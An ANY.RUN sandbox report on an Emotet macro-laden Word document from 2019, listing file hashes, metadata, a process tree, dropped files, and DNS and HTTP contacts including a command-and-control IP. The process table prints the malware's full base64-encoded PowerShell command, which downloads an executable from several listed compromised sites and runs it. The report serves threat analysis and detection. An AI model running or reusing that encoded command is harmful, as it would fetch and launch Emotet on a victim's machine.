analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

afcse9eba1qsn_owbo6-69170965

Full analysis: https://app.any.run/tasks/71db58e6-a28e-420e-b4ef-3155d04319b8
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 16:24:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Intranet, Subject: Road, Author: Mallie Skiles, Keywords: hard drive, Comments: Liberian Dollar, Template: Normal.dotm, Last Saved By: Andre Beatty, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

6898BD80C34FE417E4930BCBEE514C26

SHA1:

2507F9C7A04FF0150D4AB117744CFBB8401C17BB

SHA256:

7C96B44B991C84FC3B006C5DC34914033200478F5146E0CACB9B24A6F36565D2

SSDEEP:

3072:MeGRyYxKgdzSrGtKyIwLx3n7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:MeGRyYxKUzSSnLx39zOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • msptermsizes.exe (PID: 2840)
      • 178.exe (PID: 1784)
      • 178.exe (PID: 2988)
      • msptermsizes.exe (PID: 3404)
    • Emotet process was detected

      • 178.exe (PID: 2988)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2276)
    • PowerShell script executed

      • powershell.exe (PID: 2276)
    • Executed via WMI

      • powershell.exe (PID: 2276)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2276)
      • 178.exe (PID: 2988)
    • Starts itself from another location

      • 178.exe (PID: 2988)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2928)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Hauck - Koss
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Andre Beatty
Template: Normal.dotm
Comments: Liberian Dollar
Keywords: hard drive
Author: Mallie Skiles
Subject: Road
Title: Intranet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 178.exe no specs #EMOTET 178.exe msptermsizes.exe no specs msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\afcse9eba1qsn_owbo6-69170965.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2276powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1784"C:\Users\admin\178.exe" C:\Users\admin\178.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2988--3a2e7ef0C:\Users\admin\178.exe
178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2840"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3404--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 741
Read events
1 233
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR651E.tmp.cvr
MD5:
SHA256:
2276powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8RX90T9H4W812JAFXO8X.temp
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18492FC.wmfwmf
MD5:2344F33A41453E14A0410437115F9710
SHA256:CC735FAB5B9D09BCE7B5AF8BB2394145ED9882C2B7CE6909CB6E62D394F92549
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40E7DECD.wmfwmf
MD5:90825BAA7B8745DDA65D13047669074C
SHA256:7DEB0A65A63D24911E2ACEEDF6F46858FB77F10330809A27F7990710800D1D32
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:D38FB5F4CD98FB255BBBE6735C401DD8
SHA256:AE4C6973BE0ADD1E375D7B26DFA6EBBC7B31A1D3B2276AA2F2C4340B4C5B46B8
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7090FE6A.wmfwmf
MD5:78968EB6613489B47B425C8EA66F27A8
SHA256:C29EEAF6B10A597DDC0C55E3E5DAB4F5F2925607292459751BCCCECF780F62D7
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83C72B0.wmfwmf
MD5:3904440B860F48D98CF95199D50E5AC8
SHA256:374FBDA7CB06FF3CD25B7B05EE3B0E008CF81B137D81ABE32A9712D350CE2A29
2928WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B0F154A9728CCC2A00ADB348893626BC
SHA256:CEEE317ACB704A6B2BB3AB2C13B0F87BB6A88E1A75E07ED40320B2E8F640EAF5
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26EB715F.wmfwmf
MD5:C97C06DCFB27FAE7B4CDEF28F4F8596B
SHA256:1B2B87ECE1800BE95915AFC755A7869AAFEB70CFD35438CBECC6B55FE0C57833
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\986F7208.wmfwmf
MD5:8A0A74BAA2784DF0363371AD766712C4
SHA256:AA44AE7EE385869D3D69F51D38F56D1318B062B047556103F6C76ECAD179BCAA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3404
msptermsizes.exe
POST
23.239.29.211:443
http://23.239.29.211:443/window/arizona/nsip/merge/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2276
powershell.exe
43.255.154.26:443
thehopeherbal.com
GoDaddy.com, LLC
SG
suspicious
2276
powershell.exe
146.88.234.116:80
stephporn.com
PlanetHoster
FR
suspicious
2276
powershell.exe
166.62.103.202:443
newagesl.com
GoDaddy.com, LLC
US
suspicious
3404
msptermsizes.exe
23.239.29.211:443
Linode, LLC
US
malicious
2276
powershell.exe
35.238.93.185:443
e-centricity.com
US
unknown

DNS requests

Domain
IP
Reputation
stephporn.com
  • 146.88.234.116
suspicious
thehopeherbal.com
  • 43.255.154.26
suspicious
e-centricity.com
  • 35.238.93.185
malicious
newagesl.com
  • 166.62.103.202
suspicious

Threats

No threats detected
No debug info